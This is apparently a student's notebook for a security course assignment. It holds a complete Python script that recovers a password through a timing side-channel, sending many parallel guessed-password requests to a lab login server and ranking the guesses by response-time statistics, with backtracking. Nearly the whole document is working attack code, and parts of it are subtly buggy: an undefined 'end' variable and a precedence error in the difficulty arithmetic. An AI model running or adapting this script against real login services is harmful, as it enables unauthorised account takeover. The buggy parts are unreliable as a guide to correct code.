In [ ]:
import time
import string
import random
import math
import requests
from statistics import median, stdev, mean
from datetime import datetime
from scipy import stats
from concurrent.futures import ThreadPoolExecutor, wait, as_completed

"""
This script implements a timing-based side-channel attack to infer a password
by measuring response times from a target web service. It leverages statistical
analysis, t-tests, and parallel timing trials to guess password length and individual
characters.

Usage:
    1. input: the needed username and difficulty
    2. enter the needed username and difficulty in the input textboxes and press enter
    3. wait for the password and the time to be printed to the stdout.
"""


################################################################################
################################ CONSTANTS #####################################
################################################################################


# Base URL of the target authentication endpoint
BASE_URL = "http://aoi-assignment1.oy.ne.ro:8080"

# for local testing
# BASE_URL = "http://localhost"

# User identifier used in the attack URL
USERNAME = "315490193"

# Allowed characters in the password (lowercase a-z)
CHARSET = string.ascii_lowercase

# Number of timing trials per guess (standard)
REPEATS = 5

# Number of reapeats to verify a correct char
VERIFY_REPEATS = 2

# Initial number of timing trials to compute timing margin
INITIAL_REPEATS = 5

# Expected password length (used to pad trial strings)
PASSWORD_LENGTH = 16

# Difficulty parameter passed to the target service
DIFFICULTY = 9

# a value difined according to difficulty to fix calculations of margins
DIFFICULTY_FIX = 3.0

################################################################################
############################# HELPER FUNCTIONS #################################
################################################################################


"""
Send a HTTP GET request to the target server then measure the time took to
get a response.

Retries on network errors or server overload, sleeping a random 1-3 seconds
before retrying.

Parameters:
    password_guess (str): The password string to test in the URL.

Returns:
    tuple:
        response_time (float): Seconds elapsed during the request.
        response_text (str): Stripped text of the HTTP response body.
"""
def time_request(password_guess):
    url = f"{BASE_URL}/?user={USERNAME}&password={password_guess}&difficulty={DIFFICULTY}"
    while True:
        try:
            start = time.time()
            response = requests.get(url)
            end = time.time()
            response.raise_for_status()
            return end - start, response.text.strip()
        except requests.exceptions.RequestException:
            # If any request error occurs, back off briefly and retry
            # print("Server overload or network error, retrying...")
            time.sleep(random.randint(1, 3))


"""
Perform multiple timing trials for a given password trial string.
it does not take into account noisey times (times bigger that  1.4 * median,
or times less than 0.6 * median)
Optionally transforms raw timing values to amplify differences.

Parameters:
    trial (str): Password string to test.
    repeats (int): Number of repeated timing measurements.
    transform (bool): If True, apply a transformation to raw times.
                      Transformation: (t + 7)^2 to accentuate differences.

Returns:
    tuple:
        response (str): Server response code ("0" or "1").
        score (float): Statistic used for ranking (median of relevant times).
"""
def time_trial(trial, repeats=REPEATS, transform=True):
    times = []
    for _ in range(repeats):
        t, response = time_request(trial)
        # If correct password detected, return immediately
        if response == "1":
            return response, 0
        times.append(t)
    med = median(times)
    times_refined = []
    for i in range(len(times)):
        if not (times[i] > 1.4 * med or times[i] < 0.6 * med):
            times_refined.append(times[i])
    # Transform timing if requested to magnify small differences
    times_refined = [(pow(t + 7, 2) if transform else t) for t in times_refined]
    # Return the median as a robust central tendency measure
    return "0", med if len(times_refined) == 0 else median(times_refined)


################################################################################
############################# MAIN PROGRAM #####################################
################################################################################


"""
Guess the first character of the target password using timing analysis.
and using the timings calculates the margin (the max time minus the avg
of the top next two timings).

Returns:
    guessed: The current guess with the first correct letter found.
    margin_list: initialized zeros list with the margin found at position 0
    prev_list: initialized zeros list with the failuers times avg at position 0
    backtrack_margin_list: initialized zeros list with the backtrack margin
     at position 0
"""
def guess_first_letter():
    guessed = ""
    # Minimum time gap required to accept a character (in seconds)
    min_margin_seconds = 0.25
    # 1) Initial timing round to establish score margins
    timings = []
    prev_list = [0.0 for i in range(PASSWORD_LENGTH)]
    margin_list = [0.0 for i in range(PASSWORD_LENGTH)]
    backtrack_margin_list = [0.0 for i in range(PASSWORD_LENGTH)]
    while True:
        timings = []
        with ThreadPoolExecutor(max_workers=len(CHARSET)) as executor:
            # Submit one trial per possible first character, padded to full length
            futures = {
                executor.submit(
                    time_trial,
                    guessed + c + 'a' * (PASSWORD_LENGTH - 1),
                    INITIAL_REPEATS
                ): c for c in CHARSET
            }
                        # wait for all threads to finish
            done, _ = wait(futures.keys())
            for fut in done:
                response, score = fut.result()
                c = futures[fut]
                # If the server confirms correct prefix, return full password
                if response == "1":
                    end = time.time()
                    return guessed + c + 'a' * (PASSWORD_LENGTH - 1), [], [], []
                timings.append((score, c))

        # Sort scores descending: highest median indicates likely correct char
        timings.sort(reverse=True)
        best, best_c = timings[0]
        second, second_c = timings[1]
        third, third_c = timings[2]
        fourth = timings[3][0]
        fith = timings[4][0]
        avg_top = (second + third) / 2

        # Compute dynamic margin based on top three candidate gaps
        sum = 0.0
        for i in range(1,len(timings)):
            sum += timings[i][0]
        avg_rest = sum / (len(timings) - 1)
        min_margin_seconds = (best - avg_rest) * (0.75 - (DIFFICULTY * 0.035))
        trial_confirm_best = (guessed + best_c + 'a' * (PASSWORD_LENGTH - 1))
        trial_confirm_second = (guessed + second_c + 'a' * (PASSWORD_LENGTH - 1))
        trial_confirm_third = (guessed + third_c + 'a' * (PASSWORD_LENGTH - 1))
        _, med_best = time_trial(trial_confirm_best, repeats=VERIFY_REPEATS)
        _, med_second = time_trial(trial_confirm_second, repeats=VERIFY_REPEATS)
        _, med_third = time_trial(trial_confirm_third, repeats=VERIFY_REPEATS)
        # Accept or reject the candidate based on margin
        if med_best - ((med_second + med_third) / 2) > min_margin_seconds:
            best = (med_best + 4 * best) / 5
            min_margin_seconds = (best - avg_rest) * (0.75 - (DIFFICULTY * 0.035))
            margin_list[0] = min_margin_seconds
            backtrack_margin_list[0] = second - avg_rest
            prev_list[0]= avg_rest
            guessed += best_c
            break
    return guessed, margin_list, prev_list, backtrack_margin_list


"""
Iteratively guess each character of the target password using timing analysis.

Steps:
  1. Initial scan across CHARSET on the first position of the password
      to compute timing margins and the first correct letter.
  2. Iteratively test next character position:
      - Send parallel timing trials for remaining character candidates.
      - Apply early stopping if timing gap exceeds dynamiclly computed margin.
      - adjust margins dynamically if needed
  3. Adjust margin and backtrack if inconsistent results observed.

Returns:
    guessed: The inferred password string when found.
    time: the running time it took to return an answer.
"""
def guess_password():
    start = time.time()
    guessed = ""
    # Minimum time gap required to accept a character (in seconds)
    min_margin_seconds = 0.25
    # Track characters to skip per position when backtracking
    check_all_letters = False
    # the list that stores the timing per position
    timings = []
    # the list of the avg prev failures used to decide on backtrack step
    prev_list = []
    # the list of the margins dynamically computed and adjusted per position
    margin_list = []
    # the list of the margins used to decide on backtrack step
    backtrack_margin_list = []

    # 1) Initial timing round to establish score margins
    guessed, margin_list, prev_list, backtrack_margin_list = guess_first_letter()
    if len(margin_list) == 0:   # found early password
        return guessed, end - start

    try_again = False
    again_counter = 0
    # 2) Main iterative guessing loop
    while True:
        timings = []
        position = len(guessed)
        # Determine minimum trials before early stopping
        if check_all_letters:
            min_samples_to_early_stop = len(CHARSET)
        else:
            min_samples_to_early_stop = 5

        # if the we are guessing the last position. then simply check all possible
        # chars and check if the response is "1". backtrack otherwise.
        if position == PASSWORD_LENGTH - 1:
            with ThreadPoolExecutor(max_workers=len(CHARSET)) as executor:
                # Submit one timing trial per allowed candidate character
                futures = {
                    executor.submit(
                        time_trial,
                        guessed + c,
                        1
                    ): c for c in CHARSET
                }
            for future in futures:
                response, score = future.result()
                c = futures[future]
                # If correct prefix confirmed, return full password
                if response == "1":
                    # correct prefix found
                    executor.shutdown(wait=True)
                    end = time.time()
                    return guessed + c, end - start
            # backtrack
            guessed = guessed[:-1]
            check_all_letters = True
            continue

        with ThreadPoolExecutor(max_workers=len(CHARSET)) as executor:
            # Submit one timing trial per allowed candidate character
            futures = {
                executor.submit(
                    time_trial,
                    guessed + c + 'a' * (PASSWORD_LENGTH - position - 1),
                    REPEATS
                ): c for c in CHARSET
            }
            for future in futures:
                response, score = future.result()
                c = futures[future]
                # If correct prefix confirmed, return full password
                if response == "1":
                    # correct prefix found
                    executor.shutdown(wait=True)
                    end = time.time()
                    return guessed + c + 'a' * (PASSWORD_LENGTH - position - 1), end - start

                timings.append((score, c))
                # Apply early stopping logic if enough samples collected

                if len(timings) >= min_samples_to_early_stop:
                    timings.sort(reverse=True)
                    best, best_c = timings[0]
                    second, second_c = timings[1]
                    third, third_c = timings[2]
                    fourth = timings[3][0]
                    fith = timings[4][0]
                    avg_top = (second + third) / 2
                    avg_top_two = (second + best) / 2
                    sum = 0.0
                    for i in range(1,len(timings)):
                        sum += timings[i][0]
                    avg_rest = sum / (len(timings) - 1)
                    # incorrect guess, backtrack
                    if avg_top_two - prev_list[position - 1] < backtrack_margin_list[position - 1] * ((DIFFICULTY-1)/DIFFICULTY):
                        if position >= 2:
                            margin_list[position - 2] *= 1.25
                        check_all_letters = True
                        if len(guessed) > 1:
                            guessed = guessed[:-1]
                            again_counter = 0
                            break
                        else:
                            again_counter = 0
                            if guessed:
                                guessed = guessed[:-1]
                            if len(guessed) == 0:
                                # failed on the first position backtrack Initial timing round to establish score margins
                                guessed, margin_list, prev_list, backtrack_margin_list = guess_first_letter()
                                if len(margin_list) == 0:   # found early password
                                    return guessed, end - start
                            break
                    # If top candidate separates sufficiently, verify it
                    if best - avg_top > margin_list[position - 1]:
                        trial_confirm_best = (guessed + best_c + 'a' * (PASSWORD_LENGTH - position - 1))
                        trial_confirm_second = (guessed + second_c + 'a' * (PASSWORD_LENGTH - position - 1))
                        trial_confirm_third = (guessed + third_c + 'a' * (PASSWORD_LENGTH - position - 1))
                        _, med_best = time_trial(trial_confirm_best, repeats=VERIFY_REPEATS)
                        _, med_second = time_trial(trial_confirm_second, repeats=VERIFY_REPEATS)
                        _, med_third = time_trial(trial_confirm_third, repeats=VERIFY_REPEATS)
                        # Accept or reject the candidate based on margin
                        if med_best - ((med_second + med_third) / 2) > margin_list[position - 1]:
                            best = (med_best + 4 * best) / 5
                            prev_list[position] = avg_rest
                            backtrack_margin_list[position] = second - avg_rest
                            guessed += best_c
                            # Compute dynamic margin based on top three candidate gaps
                            if best - avg_top < DIFFICULTY_FIX * margin_list[position - 1]:
                                evaluated_margin = (2 * margin_list[position - 1] + ((best - avg_rest) * (0.75 - (DIFFICULTY * 0.035)))) / 3
                                if evaluated_margin < 0.8 * margin_list[position - 1]:
                                     margin_list[position] = margin_list[position - 1]
                                else:
                                     margin_list[position] = evaluated_margin
                            else:
                                margin_list[position] = margin_list[position - 1]
                            check_all_letters = False
                            again_counter = 0
                            break
                        else:
                            # Update timing for next iteration
                            timings = [
                                ((best + med_best) / 2, char) if char == best_c else (s, char)
                                for (s, char) in timings
                            ]

                    # Fallback: when all candidates tested at this position
                    if len(timings) == len(CHARSET):
                        # Backtrack if statistical test fails
                        check_all_letters = True
                        if not try_again and again_counter < 5:
                            sum_margins = 3 * margin_list[0]
                            for i in range(1, position):
                                sum_margins += margin_list[i]
                            avg_margins = sum_margins / (position+2)
                            margin_list[position - 1] = avg_margins * (0.7 - (again_counter * 0.03))
                            try_again = True
                            again_counter += 1
                        else:
                            if again_counter >= 5:
                                again_counter = 0
                                if len(guessed) > 1:
                                    guessed = guessed[:-1]
                                    break
                                elif len(guessed) == 1:
                                    # failed on the first position backtrack Initial timing round to establish score margins
                                    guessed, margin_list, prev_list, backtrack_margin_list = guess_first_letter()
                                    if len(margin_list) == 0:   # found early password
                                        return guessed, end - start
                                    break
                            else:
                                try_again = False

if __name__ == "__main__":
    # The username to be used for the attack (the needed ID)
    USERNAME = input("Enter username: ")
    # the needed difficulty
    DIFFICULTY = float(input("Enter difficulty: "))
    DIFFICULTY_FIX = DIFFICULTY / 1.5
    DIFFICULTY_multiplier = math.ceil((DIFFICULTY)  / 3)
    DIFFICULTY_half = math.floor(DIFFICULTY+1  / 2.5)
    REPEATS = DIFFICULTY_multiplier * DIFFICULTY_half
    INITIAL_REPEATS = (DIFFICULTY_multiplier + 1)  * DIFFICULTY_half
    password, running_time = guess_password()
    print("password: ", password)
    mins = math.floor(running_time/60)
    secs = math.floor(running_time % 60)
    print("running time:", mins, "minutes,", secs, "seconds"  )


Enter username: 208009845
Enter difficulty: 1
